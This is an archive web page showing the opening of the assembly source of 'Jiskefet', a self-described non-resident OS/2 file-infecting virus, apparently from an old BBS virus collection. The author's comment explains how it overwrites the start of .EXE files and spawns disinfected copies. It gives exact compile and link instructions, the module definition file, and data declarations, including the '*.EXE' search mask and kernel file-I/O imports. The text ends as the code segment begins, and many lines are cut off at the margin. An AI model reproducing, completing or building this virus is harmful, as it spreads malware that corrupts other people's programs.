home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
live_viruses
/
virus_collections
/
jiskefet.asm
< prev
next >
Wrap
Assembly Source File
|
1994-04-30
|
7KB
|
131 lines
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--------- Rippppppped Off The NuKNET For Your Enjoyment...-----------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
comment #
JISKEFET: a non-resident direct-action OS/2 virus
Disclaimer: This file is only for educational purposes. Do not abuse it!
The author takes no responsibility for anything anyone does with this file.
How does this virus work? Like most non-resident viruses, it first infects
other programs and then runs the original program. It infects programs by
copying the first part of the program (with the same size of the virus) to
the end of the program and then overwriting the begin with the virus. When
an infected program is executed, the virus will make a copy of the infected
program and disinfect it. It will then spawn the disinfected copy. This is
perhaps not a very elegant method. It would be nicer if the virus could jus
disinfect the current program and spawn that one. But OS/2 doesn't allow a
program that being executed to be altered.
The proper way to compile this virus is like this: first, just compile it.
Then check the size of the new created exe file. It should be the same as
the value for VIRLEN below. If not, change the value for VIRLEN and compile
again. Unfortunatly, I don't know of a way to tell the compiler what the si
of an EXE file will be after compilation. Also check out the offset of the
'MK' signature in the EXE file. It should be at the offset MKOFF. You might
have to change this one too. To generate an exact copy of the original viru
use MASM.EXE v5.0 and LINK386.EXE v2.00.000.
COMPILE.BAT:
...........................................................................
masm.exe /Zi %1.asm;
link386.exe /exepack %1.obj,,,doscalls.lib,%1.def
...........................................................................
JISKEFET.DEF:
...........................................................................
name Jiskefet windowapi ;A virus must have a name. This one is
;dedicated to the people of 'Jiskefet',
;the funniest TV program in the Netherlands
;These guys are really excelent!
;'windowapi' means that this virus will be
;compiled into a P.M. application.
protmode ;It will run in protected mode.
stacksize 8192 ;Yes, the virus needs some stack.
...........................................................................
The file doscalls.lib should be in the OS/2 directory. Copy it to your work
directory or enter the full pathname in compile.bat.
To compile this file type: compile jiskefet
#
;==========================================================================
.286 ;80286 opcodes can be used.
.radix 16 ;All numbers are hexadecima
;by default.
VIRLEN equ 2048d ;This will be the size of t
;compiled virus.
MKOFF equ 400 ;At this offset in the EXE
;will be the 'MK' signature
_srec struc ;Structure with information
cdate dw ? ;about file, returned by th
ctime dw ? ;DosFindFirst and DosFindNe
adate dw ? ;functions.
atime dw ?
wdate dw ?
wtime dw ?
fsize dd ?
falloc dd ?
fattr dw ?
fcount db ?
fname db 100 dup (?)
_srec ends
extrn DosFindFirst:far ;These external kernel
extrn DosFindNext:far ;functions are used by the
extrn DosFindClose:far ;virus.
extrn DosOpen:far
extrn DosClose:far
extrn DosRead:far
extrn DosWrite:far
extrn DosChgFilePtr:far
extrn DosNewSize:far
extrn DosGetEnv:far
extrn DosExecPgm:far
extrn DosExit:far
extrn DosDelete:far
DGROUP group _DATA
_DATA segment word public 'DATA'
;Variables used by DosFindF
;and DosFindNext functions:
filename db '*.EXE', 0 ; Filenames to search for.
dirhan dw ? ; Handle.
sbuf _srec <> ; Struct. with returned in
srchcnt dw ? ; Number of files to searc
;Variables used by DosOpen:
faction dw ? ; Open mode.
fhandle dw ? ; Handle.
fhandle2 dw ? ; Handle.
;Variables used by DosRead
;and DosWrite:
rlen dw ? ; Number of read bytes.
wlen dw ? ; Number of written bytes.
;Variables used by
;DosChgFilePtr:
new_off dw ?, ? ; New offset.
;Variables used by DosGetEn
envseg dw ? ; Segment of environment.
cmdoffs dw ? ; Offset of arguments in e
;Variables used by DosExecP
objbuf db (40) dup (?) ; Buffer for error-info.
retcode dw ?, ? ; Returns exit-code.
;Other variables:
NE_buf db (40) dup (?) ; Buffer for NE header.
namebuf db (100) dup (?) ; New filename for spawnin
buffer db (VIRLEN) dup (?) ; Main buffer.
_DATA ends
;--------------------------------------------------------------------------
; Main program.
;--------------------------------------------------------------------------
_TEXT segment word public 'CODE'
assume cs:_TEXT, ds:DGROUP